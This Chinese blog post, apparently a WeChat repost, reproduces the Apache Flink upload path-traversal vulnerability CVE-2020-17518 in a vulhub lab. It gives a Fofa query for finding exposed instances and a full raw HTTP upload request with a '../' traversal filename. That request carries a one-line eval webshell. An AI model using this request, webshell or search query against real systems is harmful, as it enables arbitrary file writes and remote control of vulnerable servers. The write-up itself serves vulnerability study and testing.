免责声明
本文仅用于技术讨论与学习,利用此文所提供的信息或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任!如有侵权请告知我们立即删除。
漏洞介绍
Apache Flink 是一个开源流处理框架,具有强大的流处理和批处理能力。Apache Flink 1.5.1 引入了一个 REST 处理程序,允许您通过恶意修改的 HTTP HEADER 将上传的文件写入本地文件系统上的任意位置。
| 影响版本 | Fofa语句 |
|---|---|
| Flink 1.5.1-1.11.2 | js_name="es2015-polyfills.923637a8e6d276e6f6df.js" |
环境搭建
-
利用vulhub搭建,搭建目录flink/CVE-2020-17518 使用命令:docker-compose up -d
![Apche Flink上传目录穿越漏洞(CVE-2020-17518)]( "Apche Flink上传目录穿越漏洞(CVE-2020-17518)")
-
访问http://ip:8081/
![Apche Flink上传目录穿越漏洞(CVE-2020-17518)]( "Apche Flink上传目录穿越漏洞(CVE-2020-17518)")
漏洞复现
-
选择Submit New Job功能并上传文件抓包
![Apche Flink上传目录穿越漏洞(CVE-2020-17518)]( "Apche Flink上传目录穿越漏洞(CVE-2020-17518)")
-
用bp抓包之后,将filename位置的shell.jar改成../../../../../../tmp/shell并发送
poc:
POST /jars/upload HTTP/1.1
Host: 192.168.1.131:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------2351364405237761153812142868
Content-Length: 259
Origin: http://192.168.1.131:8081
Connection: close
Referer: http://192.168.1.131:8081/
-----------------------------2351364405237761153812142868
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/shell"
Content-Type: application/octet-stream
<%eval request("123")%>
-----------------------------2351364405237761153812142868--
-
进入docker容器查看文件是否上传成功。 ![Apche Flink上传目录穿越漏洞(CVE-2020-17518)]( "Apche Flink上传目录穿越漏洞(CVE-2020-17518)")
成功上传
原文始发于微信公众号(Piusec):Apche Flink上传目录穿越漏洞(CVE-2020-17518)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论